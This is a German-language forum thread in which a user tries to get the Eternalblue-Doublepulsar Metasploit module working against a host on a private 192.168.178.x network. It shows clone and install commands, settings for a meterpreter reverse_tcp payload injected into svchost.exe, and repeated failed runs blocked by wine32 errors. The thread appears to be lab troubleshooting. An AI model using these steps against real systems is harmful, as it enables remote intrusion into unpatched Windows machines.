Follow along with the video below to see how to install our site as a web app on your home screen.
Anmerkung: This feature may not be available in some browsers.
Hinweis: Aus Programmierersicht (was ich nicht bin) wäre besser:
if( ! include Msf::Exploit::Remote::SMB::Client ) -> Throw Exception. Include ist nämlich eine boolean Funktion.
das Importiert (dort) bereitgestellte Variablen/Konstanten etc.Das include sorgt dann lediglich dafür, dass genau die gewünschte Funktionalität nutzbar ist.
So wie ich das sehe ist durch das require schon sichergestellt, dass die Klassen verfügbar sind. Ansonsten bricht der Code direkt in der ersten Zeile ab. Das include sorgt dann lediglich dafür, dass genau die gewünschte Funktionalität nutzbar ist.
Also doch etwas anders als es in Sprachen wie C oder C++ ist, wo das include direkt für beides sorgt, dann aber auch alles compilert.
root@kali:~# git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
Cloning into 'Eternalblue-Doublepulsar-Metasploit'...
remote: Counting objects: 65, done.
remote: Total 65 (delta 0), reused 0 (delta 0), pack-reused 65
Unpacking objects: 100% (65/65), done.
root@kali:~# cd Eternalblue-Doublepulsar-Metasploit/
root@kali:~/Eternalblue-Doublepulsar-Metasploit# mv eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.178.66
rhost => 192.168.178.66
msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT svchost.exe
PROCESSINJECT => svchost.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/metapreter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.178.44
lhost => 192.168.178.44
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.178.44:4444
[*] 192.168.178.66:445 - Generating Eternalblue XML data
[*] 192.168.178.66:445 - Generating Doublepulsar XML data
[*] 192.168.178.66:445 - Generating payload DLL for Doublepulsar
[-] 192.168.178.66:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.
Dafür wirst du dich mit den Sprachen der scripts auseinandersetzen müssen. In diesem Fall eben Ruby. Lohnt sich aber, ruby ist cool!Vor Prinzip her wollte ich mich Spezialien auf Metasploit
root@kali:~# wine --version
it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32"
wine-2.0.3 (Debian 2.0.3-1)
root@kali:~#
root@kali:~# dpkg --add-architecture i386 && apt-get update && apt-get install wine32
Paketlisten werden gelesen... Fertig
Paketlisten werden gelesen... Fertig
Abhängigkeitsbaum wird aufgebaut.
Statusinformationen werden eingelesen.... Fertig
Paket wine32 ist nicht verfügbar, wird aber von einem anderen Paket
referenziert. Das kann heißen, dass das Paket fehlt, dass es abgelöst
wurde oder nur aus einer anderen Quelle verfügbar ist.
E: Für Paket »wine32« existiert kein Installationskandidat.
root@kali:~#
File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
print_status("Writing DLL in #{dllpayload}")
f.print dll
end
mkdir -p /root/.wine/drive_c/
Ich wage mal zu bezweifeln, dass du wirklich wine brauchst, da ja die Datei eternal11.dll im Exploit-Code generiert wird:
Code:mkdir -p /root/.wine/drive_c/
Wenn du ernsthaft mit MSF arbeiten willst, solltest du dringend lernen nach Fehlermeldungen zu googlen.![]()
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.178.27:4444
[*] 192.168.178.66:445 - Generating Eternalblue XML data
[*] 192.168.178.66:445 - Generating Doublepulsar XML data
[*] 192.168.178.66:445 - Generating payload DLL for Doublepulsar
[*] 192.168.178.66:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.178.66:445 - Launching Eternalblue...
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
err:ole:marshal_object couldn't get IPSFactory buffer for interface {00000131-0000-0000-c000-000000000046}
err:ole:marshal_object couldn't get IPSFactory buffer for interface {6d5140c1-7436-11ce-8034-00aa006009fa}
err:ole:StdMarshalImpl_MarshalInterface Failed to create ifstub, hres=0x80004002
err:ole:CoMarshalInterface Failed to marshal the interface {6d5140c1-7436-11ce-8034-00aa006009fa}, 80004002
err:ole:get_local_server_stream Failed: 80004002
err:ole:marshal_object couldn't get IPSFactory buffer for interface {00000131-0000-0000-c000-000000000046}
err:ole:marshal_object couldn't get IPSFactory buffer for interface {6d5140c1-7436-11ce-8034-00aa006009fa}
err:ole:StdMarshalImpl_MarshalInterface Failed to create ifstub, hres=0x80004002
err:ole:CoMarshalInterface Failed to marshal the interface {6d5140c1-7436-11ce-8034-00aa006009fa}, 80004002
err:ole:get_local_server_stream Failed: 80004002
Could not load wine-gecko. HTML rendering will be disabled.
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
Could not load wine-gecko. HTML rendering will be disabled.
wine: configuration in '/root/.wine' has been updated.
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
wine: Fehlerhaftes EXE-Format für Z:\root\Eternalblue-Doublepulsar-Metasploit\deps\Eternalblue-2.2.0.exe.
[-] 192.168.178.66:445 - Are you sure it's vulnerable?
[*] 192.168.178.66:445 - Launching Doublepulsar...
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
wine: Fehlerhaftes EXE-Format für Z:\root\Eternalblue-Doublepulsar-Metasploit\deps\Doublepulsar-1.3.1.exe.
[-] 192.168.178.66:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) >
msf exploit(windows/smb/eternalblue_doublepulsar) > set eternalbluepath /root/Eternalblue-Doublepulsar-Metasploit/deps/
eternalbluepath => /root/Eternalblue-Doublepulsar-Metasploit/deps/
msf exploit(windows/smb/eternalblue_doublepulsar) >
root@kali:~# winecfg
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
root@kali:~#
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.178.27:4444
[*] 192.168.178.66:445 - Generating Eternalblue XML data
[*] 192.168.178.66:445 - Generating Doublepulsar XML data
[*] 192.168.178.66:445 - Generating payload DLL for Doublepulsar
[*] 192.168.178.66:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.178.66:445 - Launching Eternalblue...
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
wine: Fehlerhaftes EXE-Format für Z:\root\Eternalblue-Doublepulsar-Metasploit\deps\Eternalblue-2.2.0.exe.
[-] 192.168.178.66:445 - Are you sure it's vulnerable?
[*] 192.168.178.66:445 - Launching Doublepulsar...
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
it looks like wine32 is missing, you should install it.
as root, please execute "apt-get install wine32"
wine: Fehlerhaftes EXE-Format für Z:\root\Eternalblue-Doublepulsar-Metasploit\deps\Doublepulsar-1.3.1.exe.
[-] 192.168.178.66:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/eternalblue_doublepulsar) >